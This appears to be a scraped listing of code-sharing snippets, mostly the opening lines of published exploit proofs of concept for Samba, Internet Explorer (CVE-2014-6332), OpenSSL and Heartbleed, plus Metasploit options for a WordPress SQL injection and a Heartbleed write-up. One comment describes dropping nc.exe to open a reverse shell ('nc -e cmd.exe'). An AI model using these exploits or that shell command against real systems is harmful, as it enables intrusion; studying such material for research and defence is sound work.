extension_id=jifpbeccnghkjeaalbbjmodiffmgedin # change this ID
curl -L -o "$extension_id.zip" "https://clients2.google.com/service/update2/crx?response=redirect&os=mac&arch=x86-64&nacl_arch=x86-64&prod=chromecrx&prodchannel=stable&prodversion=44.0.2403.130&x=id%3D$extension_id%26uc"
unzip -d "$extension_id-source" "$extension_id.zip"Thx to crxviewer for the magic download URL.
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <stdbool.h> | |
| #include <stdio.h> | |
| #include <signal.h> | |
| #include <err.h> | |
| #include <string.h> | |
| #include <alloca.h> | |
| #include <limits.h> | |
| #include <sys/inotify.h> |
| #!/usr/bin/python | |
| """ | |
| PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| This PoC does only triggering the bug | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ | |
| ################# | |
| Exploitability against CentOS/Ubuntu binaries |
| Module options (auxiliary/gather/wp_photogallery_users_sqli): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| GALLERYID no Gallery ID to use. If not provided, the module will attempt to bruteforce one. | |
| Proxies no Use a proxy chain | |
| RHOST 172.31.16.30 yes The target address | |
| RPORT 80 yes The target port | |
| TARGETURI /wordpress yes Relative URI of Wordpress installation | |
| VHOST no HTTP server virtual host |
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode | |
| - Tested on IE11 + Windows 7 64-bit | |
| References: | |
| - original PoC - http://www.exploit-db.com/exploits/35229/ | |
| - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ | |
| - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html |
| $ cat > /tmp/handler.sh | |
| #! /bin/bash | |
| echo auth_ok:1 | |
| echo uid:42 | |
| echo gid:21 | |
| echo dir:/tmp | |
| echo end | |
| ^D | |
| $ chmod +x /tmp/handler.sh |
| #!/usr/bin/env python2 | |
| # | |
| # OpenSSL heap overflow PoC | |
| # Found by ZDI - ZDI-14-173 // CVE-2014-0195 | |
| # PoC by @_hugsy_ | |
| # | |
| # Ref: https://tools.ietf.org/html/rfc6347 | |
| # | |
| import socket, struct |
| I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the | |
| 10th to get it (ok, looks like I was the 8th.) But I'm happy that I was able to prove to myself | |
| that I too could do it. | |
| First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially | |
| believed that it would be highly improbable under normal conditions to obtain the private key | |
| through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's | |
| challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to | |
| extract private keys. So I wanted to see first-hand if it was possible or not. |
| #!/usr/bin/python | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # The author disclaims copyright to this source code. | |
| # | |
| # Modified slightly by Andreas Thienemann <[email protected]> for clearer exploit code | |
| # and 64k reads | |
| # | |
| # This version of the exploit does write received data to a file called "dump" in the local directory | |
| # for analysis. |